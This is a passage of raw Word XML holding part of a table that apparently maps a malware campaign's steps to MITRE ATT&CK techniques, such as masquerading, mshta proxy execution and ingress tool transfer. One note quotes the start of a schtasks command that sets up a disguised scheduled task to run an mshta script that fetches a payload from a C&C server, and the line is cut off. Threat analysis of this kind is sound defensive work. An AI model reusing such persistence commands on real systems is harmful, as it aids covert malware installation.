          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B845E16" w14:textId="64122A63" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="001A5B7F" w14:textId="78B12100" w:rsidR="007B4DCC" w:rsidRPr="00DB171B"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0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E34C106" w14:textId="749C9EE4" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18DDCB44" w14:textId="2243502D" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="572D02AA" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C513CDB" w14:textId="35BE83C0" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="001D43D9" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FCBA782" w14:textId="0A25DAB3" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="000F3EE3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12E5EDEB" w14:textId="20A5A5F3" w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B" w:rsidRDefault="007B2E5E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E357F6" w:rsidRPr="003470D7" w14:paraId="47314E9B" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="164326AD" w14:textId="31427BE8" w:rsidR="00E357F6" w:rsidRDefault="00700E34" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="292F8075" w14:textId="6D8975E4" w:rsidR="00E357F6" w:rsidRPr="003470D7" w:rsidRDefault="00E357F6"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0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E5FD888" w14:textId="77231254" w:rsidR="00E357F6" w:rsidRPr="003470D7" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E357F6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1218.005 System Binary Proxy Execution: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E357F6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E357F6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E357F6">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E028C95" w14:textId="53AE4921" w:rsidR="00E357F6" w:rsidRDefault="005D79F2" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22D80C4B" w14:textId="77777777" w:rsidR="00E357F6" w:rsidRPr="003470D7" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555C5CC1" w14:textId="42900446" w:rsidR="00E357F6" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="535F4B34" w14:textId="0B442752" w:rsidR="00E357F6" w:rsidRPr="003470D7" w:rsidRDefault="000F3EE3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D4834F0" w14:textId="77777777" w:rsidR="00E357F6" w:rsidRDefault="00E357F6" w:rsidP="00E357F6">
            <w:r>
              <w:t xml:space="preserve">[3] The purpose of the scheduled task is to download another payload from the C&amp;C </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6623C642" w14:textId="77777777" w:rsidR="00E357F6" w:rsidRDefault="00E357F6" w:rsidP="00E357F6">
            <w:r>
              <w:t xml:space="preserve">server: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0579C179" w14:textId="52508C4C" w:rsidR="00E357F6" w:rsidRDefault="00E357F6" w:rsidP="00E357F6">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>schtasks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /create /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> MINUTE /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> "Windows Error Reporting" /tr "mshta.exe () about:'&lt;script </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D4E3BC" w14:textId="2AFFFD39" w:rsidR="00E357F6" w:rsidRPr="00FF1E4B" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700E34" w:rsidRPr="00DB171B" w14:paraId="252D95D6" w14:textId="77777777" w:rsidTr="006E0AE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CDCDB4A" w14:textId="259D9EC6" w:rsidR="00700E34" w:rsidRPr="00DB171B" w:rsidRDefault="00700E34" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD59EE4" w14:textId="77777777" w:rsidR="00700E34" w:rsidRPr="00DB171B" w:rsidRDefault="00700E34" w:rsidP="006E0AE9">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0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="013D7829" w14:textId="77777777" w:rsidR="00700E34" w:rsidRPr="00DB171B" w:rsidRDefault="00700E34" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E375C84" w14:textId="0C4CB518" w:rsidR="00700E34" w:rsidRPr="00DB171B" w:rsidRDefault="00700E34" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CE50075" w14:textId="77777777" w:rsidR="00700E34" w:rsidRPr="00DB171B" w:rsidRDefault="00700E34" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="184F58F1" w14:textId="77777777" w:rsidR="00700E34" w:rsidRPr="00DB171B" w:rsidRDefault="00700E34" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D43D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3713DBDF" w14:textId="6CB2D71A" w:rsidR="00700E34" w:rsidRPr="00DB171B" w:rsidRDefault="000F3EE3" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FE6D2B1" w14:textId="77777777" w:rsidR="00700E34" w:rsidRPr="00FF1E4B" w:rsidRDefault="00700E34" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="003470D7" w14:paraId="7C2083D4" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E527B5D" w14:textId="57687718" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D537E79" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="272799B6" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3540A5F9" w14:textId="7C887BF7" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2052D940" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA2F62B" w14:textId="321CFFF2" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2C068B" w14:textId="05AEF808" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="000F3EE3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1003C81C" w14:textId="2D8B4DE2" w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B" w:rsidRDefault="006E46DD" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B">
              <w:t xml:space="preserve">The content of the “microsoftp.jpg” is a script that combines </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B">
              <w:t>vbscript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B">
              <w:t xml:space="preserve"> and PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="003470D7" w14:paraId="5CB2CC00" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="066E5BEC" w14:textId="6A07E2B5" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="00E357F6" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C9229B" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="003470D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003470D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003470D7">
